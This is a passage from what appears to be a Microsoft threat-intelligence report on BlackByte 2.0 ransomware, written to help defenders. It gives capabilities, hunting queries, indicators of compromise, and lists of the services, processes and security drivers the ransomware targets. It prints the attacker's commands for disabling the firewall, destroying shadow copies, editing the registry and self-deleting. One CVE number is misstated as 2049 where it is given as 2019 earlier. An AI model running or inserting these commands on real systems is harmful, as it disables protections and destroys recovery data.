_C:\\SystemData\\MsExchangeLog1.log_ (Log file)\n * _C:\\SystemData\\rENEgOtiAtES _(A vulnerable (CVE-2019-16098) driver _RtCore64.sys_ used to evade detection by installed antivirus software; SHA-256: 01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd)\n * _C:\\SystemData\\iHu6c4.ico_ (Random name \u2013 BlackBytes icon)\n * _C:\\SystemData\\BB_Readme_file.txt_ (BlackByte ReadMe file)\n * _C:\\SystemData\\skip_bypass.txt_ (Unknown)\n\n**BlackByte 2.0 ransomware capabilities**\n\nSome capabilities identified for the BlackByte 2.0 ransomware were:\n\n * Antivirus bypass\n * The file _rENEgOtiAtES_ created matches _RTCore64.sys_, a vulnerable driver (CVE-2049-16098) that allows any authenticated user to read or write to arbitrary memory\n * The BlackByte binary then creates and starts a service named _RABAsSaa_ calling _rENEgOtiAtES_, and exploits this service to evade detection by installed antivirus software\n * Process hollowing \n * Invokes _svchost.exe_, injects to it to complete device encryption, and self-deletes by executing the following command: \n * `cmd.exe /c ping 1.1.1.1 -n 10 > Nul & Del \u201cPATH_TO_BLACKBYTE\u201d /F /Q`\n * Modification / disabling of Windows Firewall \n * The following commands are executed to either modify existing Windows Firewall rules, or to disable Windows Firewall entirely:\n * `cmd /c netsh advfirewall set allprofiles state off`\n * * `cmd /c netsh advfirewall firewall set rule group=\u201dFile and Printer Sharing\u201d new enable=Yes`\n * `cmd /c netsh advfirewall firewall set rule group=\u201dNetwork Discovery\u201d new enable=Yes`\n * Modification of volume shadow copies \n * The following commands are executed to destroy volume shadow copies on the machine:\n * `cmd /c vssadmin Resize ShadowStorge /For=B:\\ /On=B:\\ /MaxSize=401MB`\n * `cmd /c vssadmin Resize ShadowStorage /For=B:\\ /On=B:\\ /MaxSize=UNBOUNDED`\n * Modification of registry keys/values \n * The following commands are executed to modify the registry, facilitating elevated execution on the device:\n * `cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f`\n * * `cmd /c reg add HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f`\n * `cmd /c reg add HKLM\\\\SYSTEM\\\\CurrentControlSet\\\\Control\\\\FileSystem /v LongPathsEnabled /t REG_DWORD /d 1 /f`\n * Additional functionality\n * Ability to terminate running services and processes\n * Ability to enumerate and mount volumes and network shares for encryption\n * Perform anti-forensics technique timestomping (sets the file time of encrypted and ReadMe file to 2000-01-01 00:00:00)\n * Ability to perform anti-debugging techniques\n\n## Recommendations\n\nTo guard against BlackByte ransomware attacks, Microsoft recommends the following:\n\n * Ensure that you have a patch management process in place and that patching for internet-exposed devices is prioritized; Understand and assess your cyber exposure with advanced vulnerability and configuration assessment tools like [Microsoft Defender Vulnerability Management**_ _**](<https://learn.microsoft.com/microsoft-365/security/defender-vulnerability-management/defender-vulnerability-management?view=o365-worldwide>)**__**\n * Implement an endpoint detection and response (EDR) solution like [Microsoft Defender for Endpoint](<https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-endpoint>) to gain visibility into malicious activity in real time across your network\n * Ensure antivirus protections are updated regularly by [turning on cloud-based protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/configure-block-at-first-sight-microsoft-defender-antivirus?view=o365-worldwide>) and that your antivirus solution is configured to block threats\n * Enable [tamper protection](<https://learn.microsoft.com/microsoft-365/security/defender-endpoint/prevent-changes-to-security-settings-with-tamper-protection?view=o365-worldwide>) to prevent components of Microsoft Defender Antivirus from being disabled\n * Block inbound traffic from IPs specified in the indicators of compromise section of this report\n * Block inbound traffic from TOR exit nodes\n * Block inbound access from unauthorized public VPN services\n * Restrict administrative privileges to prevent authorized system changes\n\n## Conclusion\n\nBlackByte ransomware attacks target organizations that have infrastructure with unpatched vulnerabilities. As outlined in the [Microsoft Digital Defense Report](<https://www.microsoft.com/security/business/microsoft-digital-defense-report-2022>), common security hygiene practices, including keeping systems up to date, could protect against 98% of attacks.\n\nAs new tools are being developed by threat actors, a modern threat protection solution like Microsoft 365 Defender is necessary to prevent and detect the multiple techniques used in the attack chain, especially where the threat actor attempts to evade or disable specific defense mechanisms. Hunting for malicious behavior should be performed regularly in order to detect potential attacks that could evade detections, as a complementary activity for continuous monitoring from security tools alerts and incidents.\n\nTo understand how Microsoft can help you secure your network and respond to network compromise, visit https://aka.ms/MicrosoftIR.\n\n## Microsoft 365 Defender detections\n\n**Microsoft Defender Antivirus**\n\nMicrosoft Defender Antivirus detects this threat as the following malware:\n\n * Trojan:Win32/Kovter!MSR\n * Trojan:Win64/WinGoObfusc.LK!MT\n * Trojan:Win64/BlackByte!MSR\n * HackTool:Win32/AdFind!MSR\n * Trojan:Win64/CobaltStrike!MSR\n\n**Microsoft Defender for Endpoint**\n\nThe following alerts might indicate threat activity related to this threat. Note, however, that these alerts can be also triggered by unrelated threat activity.\n\n * 'CVE-2021-31207' exploit malware was detected\n * An active 'NetShDisableFireWall' malware in a command line was prevented from executing.\n * Suspicious registry modification.\n * \u2018Rtcore64\u2019 hacktool was detected\n * Possible ongoing hands-on-keyboard activity (Cobalt Strike)\n * A file or network connection related to a ransomware-linked emerging threat activity group detected\n * Suspicious sequence of exploration activities\n * A process was injected with potentially malicious code\n * Suspicious behavior by cmd.exe was observed\n * 'Blackbyte' ransomware was detected\n\n**Microsoft Defender Vulnerability Management**\n\nMicrosoft Defender Vulnerability Management surfaces devices that may be affected by the following vulnerabilities used in this threat:\n\n * CVE-2021-34473\n * CVE-2021-34523\n * CVE-2021-31207\n * CVE-2019-16098\n\n## Hunting queries\n\n**Microsoft 365 Defender**\n\nMicrosoft 365 Defender customers can run the following query to find related activity in their networks:\n\n**ProxyShell web shell creation events**\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_any (\"ExcludeDumpster\",\"New-ExchangeCertificate\") and ProcessCommandLine has_any (\"-RequestFile\",\"-FilePath\")\n \n\n**Suspicious vssadmin events**\n \n \n DeviceProcessEvents\n | where ProcessCommandLine has_any (\"vssadmin\",\"vssadmin.exe\") and ProcessCommandLine has \"Resize ShadowStorage\" and ProcessCommandLine has_any (\"MaxSize=401MB\",\" MaxSize=UNBOUNDED\")\n \n\n**Detection for persistence creation using Registry Run keys**\n \n \n DeviceRegistryEvents \n | where ActionType == \"RegistryValueSet\" \n | where (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\RunOnce\" and RegistryValueName == \"MsEdgeMsE\") \n or (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\RunOnceEx\" and RegistryValueName == \"MsEdgeMsE\")\n or (RegistryKey has @\"Microsoft\\Windows\\CurrentVersion\\Run\" and RegistryValueName == \"MsEdgeMsE\")\n | where RegistryValueData startswith @\"rundll32\"\n | where RegistryValueData endswith @\".dll,Default\"\n | project Timestamp,DeviceId,DeviceName,ActionType,RegistryKey,RegistryValueName,RegistryValueData\n \n\n**Microsoft Sentinel**\n\nMicrosoft Sentinel customers can use the TI Mapping analytics (a series of analytics all prefixed with \u2018TI map\u2019) to automatically match the malicious domain indicators mentioned in this blog post with data in their workspace. If the TI Map analytics are not currently deployed, customers can install the Threat Intelligence solution from the Microsoft Sentinel Content Hub to have the analytics rule deployed in their Sentinel workspace. More details on the Content Hub can be found here: <https://learn.microsoft.com/azure/sentinel/sentinel-solutions-deploy>\n\nMicrosoft Sentinel also has a range of detection and threat hunting content that customers can use to detect the post exploitation activity detailed in this blog in addition to Microsoft 365 Defender detections list above.\n\n * [ProxyShell](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Detections/W3CIISLog/ProxyShellPwn2Own.yaml>)\n * [Web shell activity](<https://github.com/Azure/Azure-Sentinel/blob/master/Solutions/Web%20Shells%20Threat%20Protection/Hunting%20Queries/WebShellActivity.yaml>)\n * [Suspicious file downloads on Exchange Servers](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Detections/http_proxy_oab_CL/ExchagngeSuspiciousFileDownloads.yaml>)\n * [Firewall rule changes](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Hunting%20Queries/MultipleDataSources/FirewallRuleChanges_using_netsh.yaml>)\n * [Shadow copy deletion](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Hunting%20Queries/Microsoft%20365%20Defender/Ransomware/ShadowCopyDeletion.yml>)\n * [Anamolous RDP activity](<https://github.com/Azure/Azure-Sentinel/blob/dd6cfe437382dfbd86ac36b76a125fda0c9de0aa/Solutions/UEBA%20Essentials/Hunting%20Queries/Anomalous%20RDP%20Activity.yaml>)\n\n## Indicators of compromise\n\nThe table below shows IOCs observed during our investigation. We encourage our customers to investigate these indicators in their environments and implement detections and protections to identify past related activity and prevent future attacks against their systems.\n\nIndicator| Type| Description \n---|---|--- \n4a066569113a569a6feb8f44257ac8764ee8f2011765009fdfd82fe3f4b92d3e| SHA-256| api-msvc.dll (Backdoor installed through RunKeys) \n5f37b85687780c089607670040dbb3da2749b91b8adc0aa411fd6280b5fa7103| SHA-256| sys.exe (Cobalt Strike Beacon) \n01aa278b07b58dc46c84bd0b1b5c8e9ee4e62ea0bf7a695862444af32e87f1fd| SHA-256| rENEgOtiAtES (Vulnerable driver RtCore64.sys created by BlackByte binary) \nba3ec3f445683d0d0407157fda0c26fd669c0b8cc03f21770285a20b3133098f| SHA-256| [RANDOM_NAME].exe (UPX Packed PsExec created by BlackByte binary) \n1b9badb1c646a19cdf101ac4f6fdd23bc61eaab8c9f925eb41848cea9fd0738e| SHA-256| \u201cnetscan.exe\u201d, \u201cnetapp.exe (Netscan network discovery tool) \nf157090fd3ccd4220298c06ce8734361b724d80459592b10ac632acc624f455e| SHA-256| AdFind.exe (Active Directory information gathering tool) \nhxxps://myvisit[.]alteksecurity[.]org/t| URL| C2 for backdoor api-msvc.dll \nhxxps://temp[.]sh/szAyn/sys.exe| URL| Download URL for sys.exe \n109.206.243[.]59| IP Address| C2 for Cobalt Strike Beacon sys.exe \n185.225.73[.]244| IP Address| Originating IP address for ProxyShell exploitation and web shell interaction \n \n**NOTE:** These indicators should not be considered exhaustive for this observed activity.\n\n## Appendix\n\nFile extensions targeted by BlackByte binary for encryption:\n\n.4dd| .4dl| .accdb| .accdc| .accde| .accdr| .accdt| .accft \n---|---|---|---|---|---|---|--- \n.adb| .ade| .adf| .adp| .arc| .ora| .alf| .ask \n.btr| .bdf| .cat| .cdb| .ckp| .cma| .cpd| .dacpac \n.dad| .dadiagrams| .daschema| .db| .db-shm| .db-wal| .db3| .dbc \n.dbf| .dbs| .dbt| .dbv| . dbx| . dcb| . dct| . dcx \n. ddl| . dlis| . dp1| . dqy| . dsk| . dsn| . dtsx| . dxl \n. eco| . ecx| . edb| . epim| . exb| . fcd| . fdb| . fic \n. fmp| . fmp12| . fmpsl| . fol| .fp3| . fp4| . fp5| . fp7 \n. fpt| . frm| . gdb| . grdb| . gwi| . hdb| . his| . ib \n. idb| . ihx| . itdb| . itw| . jet| . jtx| . kdb| . kexi \n. kexic| . kexis| . lgc| . lwx| . maf| . maq| . mar| . masmav \n. mdb| . mpd| . mrg| . mud| . mwb| . myd| . ndf| . nnt \n. nrmlib| . ns2| . ns3| . ns4| . nsf| . nv| . nv2| . nwdb \n. nyf| . odb| . ogy| . orx| . owc| . p96| . p97| . pan \n. pdb| . pdm| . pnz| . qry| . qvd| . rbf| . rctd| . rod \n. rodx| . rpd| . rsd| . sas7bdat| . sbf| . scx| . sdb| . sdc \n. sdf| . sis| . spg| . sql| . sqlite| . sqlite3| . sqlitedb| . te \n. temx| . tmd| . tps| . trc| . trm| . udb| . udl| . usr \n. v12| . vis| . vpd| . vvv| . wdb| . wmdb| . wrk| . xdb \n. xld| . xmlff| . abcddb| . abs| . abx| . accdw| . and| . db2 \n. fm5| . hjt| . icg| . icr| . kdb| . lut| . maw| . mdn \n. mdt| | | | | | | \n \nShared folders targeted for encryption (Example: _\\\\\\\\[IP address]\\Downloads_):\n\nUsers| Backup| Veeam| homes| home \n---|---|---|---|--- \nmedia| common| Storage Server| Public| Web \nImages| Downloads| BackupData| ActiveBackupForBusiness| Backups \nNAS-DC| DCBACKUP| DirectorFiles| share| \n \nFile extensions ignored:\n\n.ini| .url| .msilog| .log| .ldf| .lock| .theme| .msi \n---|---|---|---|---|---|---|--- \n.sys| .wpx| .cpl| .adv| .msc| .scr| .key| .ico \n.dll| .hta| .deskthemepack| .nomedia| .msu| .rtp| .msp| .idx \n.ani| .386| .diagcfg| .bin| .mod| .ics| .com| .hlp \n .spl| .nls| .cab| .exe| .diagpkg| .icl| .ocx| .rom \n.prf| .thempack| .msstyles| .icns| .mpa| .drv| .cur| .diagcab \n.cmd| .shs| | | | | | \n \nFolders ignored:\n\nwindows| boot| program files (x86)| windows.old| programdata \n---|---|---|---|--- \nintel| bitdefender| trend micro| windowsapps| appdata \napplication data| system volume information| perflogs| msocache| \n \nFiles ignored:\n\nbootnxt| ntldr| bootmgr| thumbs.db \n---|---|---|--- \nntuser.dat| bootsect.bak| autoexec.bat| iconcache.db \nbootfont.bin| | | \n \nProcesses terminated:\n\nteracopy| teamviewer| nsservice| nsctrl| uranium \n---|---|---|---|--- \nprocesshacker| procmon| pestudio| procmon64| x32dbg \nx64dbg| cff explorer| procexp| pslist| tcpview \ntcpvcon| dbgview| rammap| rammap64| vmmap \nollydbg| autoruns| autorunssc| filemon| regmon \nidaq| idaq64| immunitydebugger| wireshark| dumpcap \nhookexplorer| importrec| petools| lordpe| sysinspector \nproc_analyzer| sysanalyzer| sniff_hit| windbg| joeboxcontrol \njoeboxserver| resourcehacker| fiddler| httpdebugger| dumpit \nrammap| rammap64| vmmap| agntsvc| cntaosmgr \ndbeng50| dbsnmp| encsvc| infopath| isqlplussvc \nmbamtray| msaccess| msftesql| mspub| mydesktopqos \nmydesktopservice| mysqld| mysqld-nt| mysqld-opt| Ntrtscan \nocautoupds| ocomm| ocssd| onenote| oracle \noutlook| PccNTMon| powerpnt| sqbcoreservice| sql \nsqlagent| sqlbrowser| sqlservr| sqlwriter| steam \nsynctime| tbirdconfig| thebat| thebat64| thunderbird \ntmlisten| visio| winword| wordpad| xfssvccon \nzoolz| | | | \n \nServices terminated:\n\nCybereasonRansomFree| vnetd| bpcd| SamSs| TeraCopyService \n---|---|---|---|--- \nmsftesql| nsService| klvssbridge64| vapiendpoint| ShMonitor \nSmcinst| SmcService| SntpService| svcGenericHost| Swi_ \nTmCCSF| tmlisten| TrueKey| TrueKeyScheduler| TrueKeyServiceHelper \nWRSVC| McTaskManager| OracleClientCache80| mfefire| wbengine \nmfemms| RESvc| mfevtp| sacsvr| SAVAdminService \nSepMasterService| PDVFSService| ESHASRV| SDRSVC| FA_Scheduler \nKAVFS| KAVFS_KAVFSGT| kavfsslp| klnagent| macmnsvc \nmasvc| MBAMService| MBEndpointAgent| McShield| audioendpointbuilder \nAntivirus| AVP| DCAgent| bedbg| EhttpSrv \nMMS| ekrn| EPSecurityService| EPUpdateService| ntrtscan \nEsgShKernel| msexchangeadtopology| AcrSch2Svc| MSOLAP$TPSAMA| Intel(R) PROSet Monitoring \nmsexchangeimap4| ARSM| unistoresvc_1af40a| ReportServer$TPS| MSOLAP$SYSTEM_BGC \nW3Svc| MSExchangeSRS| ReportServer$TPSAMA| Zoolz 2 Service| MSOLAP$TPS \naphidmonitorservice| SstpSvc| MSExchangeMTA| ReportServer$SYSTEM_BGC| Symantec System Recovery \nUI0Detect| MSExchangeSA| MSExchangeIS| ReportServer| MsDtsServer110 \nPOP3Svc| MSExchangeMGMT| SMTPSvc| MsDtsServer| IisAdmin \nMSExchangeES| EraserSvc11710| Enterprise Client Service| MsDtsServer100| NetMsmqActivator \nstc_raw_agent| VSNAPVSS| PDVFSService| AcrSch2Svc| Acronis \nCASAD2DWebSvc| CAARCUpdateSvc| McAfee| avpsus| DLPAgentService \nmfewc| BMR Boot Service| DefWatch| ccEvtMgr| ccSetMgr \nSavRoam| RTVsc screenconnect| ransom| sqltelemetry| msexch \nvnc| teamviewer| msolap| veeam| backup \nsql| memtas| vss| sophos| svc$ \nmepocs| wuauserv| | | \n \nDrivers that Blackbyte can bypass:\n\n360avflt.sys| 360box.sys| 360fsflt.sys| 360qpesv.sys| 5nine.cbt.sys \n---|---|---|---|--- \na2acc.sys| a2acc64.sys| a2ertpx64.sys| a2ertpx86.sys| a2gffi64.sys \na2gffx64.sys| a2gffx86.sys| aaf.sys| aalprotect.sys| abrpmon.sys \naccessvalidator.sys| acdriver.sys| acdrv.sys| adaptivaclientcache32.sys| adaptivaclientcache64.sys \nadcvcsnt.sys| adspiderdoc.sys| aefilter.sys| agentrtm64.sys| agfsmon.sys \nagseclock.sys| agsyslock.sys| ahkamflt.sys| ahksvpro.sys| ahkusbfw.sys \nahnrghlh.sys| aictracedrv_am.sys| airship-filter.sys| ajfsprot.sys| alcapture.sys \nalfaff.sys| altcbt.sys| amfd.sys| amfsm.sys| amm6460.sys \namm8660.sys| amsfilter.sys| amznmon.sys| antileakfilter.sys| antispyfilter.sys \nanvfsm.sys| apexsqlfilterdriver.sys| appcheckd.sys| appguard.sys| appvmon.sys \narfmonnt.sys| arta.sys| arwflt.sys| asgard.sys| ashavscan.sys \nasiofms.sys| aswfsblk.sys| aswmonflt.sys| aswsnx.sys| aswsp.sys \naszfltnt.sys| atamptnt.sys| atc.sys| atdragent.sys| atdragent64.sys \naternityregistryhook.sys| atflt.sys| atrsdfw.sys| auditflt.sys| aupdrv.sys \navapsfd.sys| avc3.sys| avckf.sys| avfsmn.sys| avgmfi64.sys \navgmfrs.sys| avgmfx64.sys| avgmfx86.sys| avgntflt.sys| avgtpx64.sys \navgtpx86.sys| avipbb.sys| avkmgr.sys| avmf.sys| awarecore.sys \naxfltdrv.sys| axfsysmon.sys| ayfilter.sys| b9kernel.sys| backupreader.sys \nbamfltr.sys| bapfecpt.sys| bbfilter.sys| bd0003.sys| bddevflt.sys \nbdfiledefend.sys| bdfilespy.sys| bdfm.sys| bdfsfltr.sys| bdprivmon.sys \nbdrdfolder.sys| bdsdkit.sys| bdsfilter.sys| bdsflt.sys| bdsvm.sys \nbdsysmon.sys| bedaisy.sys| bemk.sys| bfaccess.sys| bfilter.sys \nbfmon.sys| bhdrvx64.sys| bhdrvx86.sys| bhkavka.sys| bhkavki.sys \nbkavautoflt.sys| bkavsdflt.sys| blackbirdfsa.sys| blackcat.sys| bmfsdrv.sys \nbmregdrv.sys| boscmflt.sys| bosfsfltr.sys| bouncer.sys| boxifier.sys \nbrcow_x_x_x_x.sys| brfilter.sys| brnfilelock.sys| brnseclock.sys| browsermon.sys \nbsrfsflt.sys| bssaudit.sys| bsyaed.sys| bsyar.sys| bsydf.sys \nbsyirmf.sys| bsyrtm.sys| bsysp.sys| bsywl.sys| bwfsdrv.sys \nbzsenspdrv.sys| bzsenth.sys| bzsenyaradrv.sys| caadflt.sys| caavfltr.sys \ncancelsafe.sys| carbonblackk.sys| catflt.sys| catmf.sys| cbelam.sys \ncbfilter20.sys| cbfltfs4.sys| cbfsfilter2017.sys| cbfsfilter2020.sys| cbsampledrv.sys \ncdo.sys| cdrrsflt.sys| cdsgfsfilter.sys| centrifyfsf.sys| cfrmd.sys \ncfsfdrv| cgwmf.sys| change.sys| changelog.sys| chemometecfilter.sys \nciscoampcefwdriver.sys| ciscoampheurdriver.sys| ciscosam.sys| clumiochangeblockmf.sys| cmdccav.sys \ncmdcwagt.sys| cmdguard.sys| cmdmnefs.sys| cmflt.sys| code42filter.sys \ncodex.sys| conduantfsfltr.sys| containermonitor.sys| cpavfilter.sys| cpavkernel.sys \ncpepmon.sys| crexecprev.sys| crncache32.sys| crncache64.sys| crnsysm.sys \ncruncopy.sys| csaam.sys| csaav.sys| csacentr.sys| csaenh.sys \ncsagent.sys| csareg.sys| csascr.sys| csbfilter.sys| csdevicecontrol.sys \ncsfirmwareanalysis.sys| csflt.sys| csmon.sys| cssdlp.sys| ctamflt.sys \nctifile.sys| ctinet.sys| ctrpamon.sys| ctx.sys| cvcbt.sys \ncvofflineflt32.sys| cvofflineflt64.sys| cvsflt.sys| cwdriver.sys| cwmem2k64.sys \ncybkerneltracker.sys| cylancedrv64.sys| cyoptics.sys| cyprotectdrv32.sys| cyprotectdrv64.sys \ncytmon.sys| cyverak.sys| cyvrfsfd.sys| cyvrlpc.sys| cyvrmtgn.sys \ndatanow_driver.sys| dattofsf.sys| da_ctl.sys| dcfafilter.sys| dcfsgrd.sys \ndcsnaprestore.sys| deepinsfs.sys| delete_flt.sys| devmonminifilter.sys| dfmfilter.sys \ndgedriver.sys| dgfilter.sys| dgsafe.sys| dhwatchdog.sys| diflt.sys \ndiskactmon.sys| dkdrv.sys| dkrtwrt.sys| dktlfsmf.sys| dnafsmonitor.sys \ndocvmonk.sys| docvmonk64.sys| dpmfilter.sys| drbdlock.sys| drivesentryfilterdriver2lite.sys \ndrsfile.sys| drvhookcsmf.sys| drvhookcsmf_amd64.sys| drwebfwflt.sys| drwebfwft.sys \ndsark.sys| dsdriver.sys| dsfemon.sys| dsflt.sys| dsfltfs.sys \ndskmn.sys| dtdsel.sys| dtpl.sys| dwprot.sys| dwshield.sys \ndwshield64.sys| eamonm.sys| easeflt.sys| easyanticheat.sys| eaw.sys \necatdriver.sys| edevmon.sys| ednemfsfilter.sys| edrdrv.sys| edrsensor.sys \nedsigk.sys| eectrl.sys| eetd32.sys| eetd64.sys| eeyehv.sys \neeyehv64.sys| egambit.sys| egfilterk.sys| egminflt.sys| egnfsflt.sys \nehdrv.sys| elock2fsctldriver.sys| emxdrv2.sys| enigmafilemondriver.sys| enmon.sys \nepdrv.sys| epfw.sys| epfwwfp.sys| epicfilter.sys| epklib.sys \nepp64.sys| epregflt.sys| eps.sys| epsmn.sys| equ8_helper.sys \neraser.sys| esensor.sys| esprobe.sys| estprmon.sys| estprp.sys \nestregmon.sys| estregp.sys| estrkmon.sys| estrkr.sys| eventmon.sys \nevmf.sys| evscase.sys| excfs.sys| exprevdriver.sys| failattach.sys \nfailmount.sys| fam.sys| fangcloud_autolock_driver.sys| fapmonitor.sys| farflt.sys \nfarwflt.sys| fasdriver| fcnotify.sys| fcontrol.sys| fdrtrace.sys \nfekern.sys| fencry.sys| ffcfilt.sys| ffdriver.sys| fildds.sys \nfilefilter.sys| fileflt.sys| fileguard.sys| filehubagent.sys| filemon.sys \nfilemonitor.sys| filenamevalidator.sys| filescan.sys| filesharemon.sys| filesightmf.sys \nfilesystemcbt.sys| filetrace.sys| file_monitor.sys| file_protector.sys| file_tracker.sys \nfilrdriver.sys| fim.sys| fiometer.sys| fiopolicyfilter.sys| fjgsdis2.sys \nfjseparettifilterredirect.sys| flashaccelfs.sys| flightrecorder.sys| fltrs329.sys| flyfs.sys \nfmdrive.sys| fmkkc.sys| fmm.sys| fortiaptfilter.sys| fortimon2.sys \nfortirmon.sys| fortishield.sys| fpav_rtp.sys| fpepflt.sys| fsafilter.sys \nfsatp.sys| fsfilter.sys| fsgk.sys| fshs.sys| fsmon.sys \nfsmonitor.sys| fsnk.sys| fsrfilter.sys| fstrace.sys| fsulgk.sys \nfsw31rj1.sys| gagsecurity.sys| gbpkm.sys| gcffilter.sys| gddcv.sys \ngefcmp.sys| gemma.sys| geprotection.sys| ggc.sys| gibepcore.sys \ngkff.sys| gkff64.sys| gkpfcb.sys| gkpfcb64.sys| gofsmf.sys \ngpminifilter.sys| groundling32.sys| groundling64.sys| gtkdrv.sys| gumhfilter.sys \ngzflt.sys| hafsnk.sys| hbflt.sys| hbfsfltr.sys| hcp_kernel_acq.sys \nhdcorrelatefdrv.sys| hdfilemon.sys| hdransomoffdrv.sys| hdrfs.sys| heimdall.sys \nhexisfsmonitor.sys| hfileflt.sys| hiofs.sys| hmpalert.sys| hookcentre.sys \nhooksys.sys| hpreg.sys| hsmltmon.sys| hsmltwhl.sys| hssfwhl.sys \nhvlminifilter.sys| ibr2fsk.sys| iccfileioad.sys| iccfilteraudit.sys| iccfiltersc.sys \nicfclientflt.sys| icrlmonitor.sys| iderafilterdriver.sys| ielcp.sys| ieslp.sys \nifs64.sys| ignis.sys| iguard.sys| iiscache.sys| ikfilesec.sys \nim.sys| imffilter.sys| imfilter.sys| imgguard.sys| immflex.sys \nimmunetprotect.sys| immunetselfprotect.sys| inisbdrv64.sys| ino_fltr.sys| intelcas.sys \nintmfs.sys| inuse.sys| invprotectdrv.sys| invprotectdrv64.sys| ionmonwdrv.sys \niothorfs.sys| ipcomfltr.sys| ipfilter.sys| iprotect.sys| iridiumswitch.sys \nirongatefd.sys| isafekrnl.sys| isafekrnlmon.sys| isafermon| isecureflt.sys \nisedrv.sys| isfpdrv.sys| isirmfmon.sys| isregflt.sys| isregflt64.sys \nissfltr.sys| issregistry.sys| it2drv.sys| it2reg.sys| ivappmon.sys \niwdmfs.sys| iwhlp.sys| iwhlp2.sys| iwhlpxp.sys| jdppsf.sys \njdppwf.sys| jkppob.sys| jkppok.sys| jkpppf.sys| jkppxk.sys \nk7sentry.sys| kavnsi.sys| kawachfsminifilter.sys| kc3.sys| kconv.sys \nkernelagent32.sys| kewf.sys| kfac.sys| kfileflt.sys| kisknl.sys \nklam.sys| klbg.sys| klboot.sys| kldback.sys| kldlinf.sys \nkldtool.sys| klfdefsf.sys| klflt.sys| klgse.sys| klhk.sys \nklif.sys| klifaa.sys| klifks.sys| klifsm.sys| klrsps.sys \nklsnsr.sys| klupd_klif_arkmon.sys| kmkuflt.sys| kmnwch.sys| kmxagent.sys \nkmxfile.sys| kmxsbx.sys| ksfsflt.sys| ktfsfilter.sys| ktsyncfsflt.sys \nkubwksp.sys| lafs.sys| lbd.sys| lbprotect.sys| lcgadmon.sys \nlcgfile.sys| lcgfilemon.sys| lcmadmon.sys| lcmfile.sys| lcmfilemon.sys \nlcmprintmon.sys| ldsecdrv.sys| libwamf.sys| livedrivefilter.sys| llfilter.sys \nlmdriver.sys| lnvscenter.sys| locksmith.sys| lragentmf.sys| lrtp.sys \nmagicbackupmonitor.sys| magicprotect.sys| majoradvapi.sys| marspy.sys| maxcryptmon.sys \nmaxproc64.sys| maxprotector.sys| mbae64.sys| mbam.sys| mbamchameleon.sys \nmbamshuriken.sys| mbamswissarmy.sys| mbamwatchdog.sys| mblmon.sys| mcfilemon32.sys \nmcfilemon64.sys| mcstrg.sys| mearwfltdriver.sys| message.sys| mfdriver.sys \nmfeaack.sys| mfeaskm.sys| mfeavfk.sys| mfeclnrk.sys| mfeelamk.sys \nmfefirek.sys| mfehidk.sys| mfencbdc.sys| mfencfilter.sys| mfencoas.sys \nmfencrk.sys| mfeplk.sys| mfewfpk.sys| miniicpt.sys| minispy.sys \nminitrc.sys| mlsaff.sys| mmpsy32.sys| mmpsy64.sys| monsterk.sys \nmozycorpfilter.sys| mozyenterprisefilter.sys| mozyentfilter.sys| mozyhomefilter.sys| mozynextfilter.sys \nmozyoemfilter.sys| mozyprofilter.sys| mpfilter.sys| mpkernel.sys| mpksldrv.sys \nmpxmon.sys| mracdrv.sys| mrxgoogle.sys| mscan-rt.sys| msiodrv4.sys \nmsixpackagingtoolmonitor.sys| msnfsflt.sys| mspy.sys| mssecflt.sys| mtsvcdf.sys \nmumdi.sys| mwac.sys| mwatcher.sys| mwfsmfltr.sys| mydlpmf.sys \nnamechanger.sys| nanoavmf.sys| naswsp.sys| ndgdmk.sys| neokerbyfilter \nnetaccctrl.sys| netaccctrl64.sys| netguard.sys| netpeeker.sys| ngscan.sys \nnlcbhelpi64.sys| nlcbhelpx64.sys| nlcbhelpx86.sys| nlxff.sys| nmlhssrv01.sys \nnmpfilter.sys| nntinfo.sys| novashield.sys| nowonmf.sys| npetw.sys \nnprosec.sys| npxgd.sys| npxgd64.sys| nravwka.sys| nrcomgrdka.sys \nnrcomgrdki.sys| nregsec.sys| nrpmonka.sys| nrpmonki.sys| nsminflt.sys \nnsminflt64.sys| ntest.sys| ntfsf.sys| ntguard.sys| ntps_fa.sys \nnullfilter.sys| nvcmflt.sys| nvmon.sys| nwedriver.sys| nxfsmon.sys \nnxrmflt.sys| oadevice.sys| oavfm.sys| oczminifilter.sys| odfsfilter.sys \nodfsfimfilter.sys| odfstokenfilter.sys| offsm.sys| omfltlh.sys| osiris.sys \nospfile_mini.sys| ospmon.sys| parity.sys| passthrough.sys| path8flt.sys \npavdrv.sys| pcpifd.sys| pctcore.sys| pctcore64.sys| pdgenfam.sys \npecfilter.sys| perfectworldanticheatsys.sys| pervac.sys| pfkrnl.sys| pfracdrv.sys \npgpfs.sys| pgpwdefs.sys| phantomd.sys| phdcbtdrv.sys| pkgfilter.sys \npkticpt.sys| plgfltr.sys| plpoffdrv.sys| pointguardvista64f.sys| pointguardvistaf.sys \npointguardvistar32.sys| pointguardvistar64.sys| procmon11.sys| proggerdriver.sys| psacfileaccessfilter.sys \npscff.sys| psgdflt.sys| psgfoctrl.sys| psinfile.sys| psinproc.sys \npsisolator.sys| pwipf6.sys| pwprotect.sys| pzdrvxp.sys| qdocumentref.sys \nqfapflt.sys| qfilter.sys| qfimdvr.sys| qfmon.sys| qminspec.sys \nqmon.sys| qqprotect.sys| qqprotectx64.sys| qqsysmon.sys| qqsysmonx64.sys \nqutmdrv.sys| ranpodfs.sys| ransomdefensexxx.sys| ransomdetect.sys| reaqtor.sys \nredlight.sys| regguard.sys| reghook.sys| regmonex.sys| repdrv.sys \nrepmon.sys| revefltmgr.sys| reveprocprotection.sys| revonetdriver.sys| rflog.sys 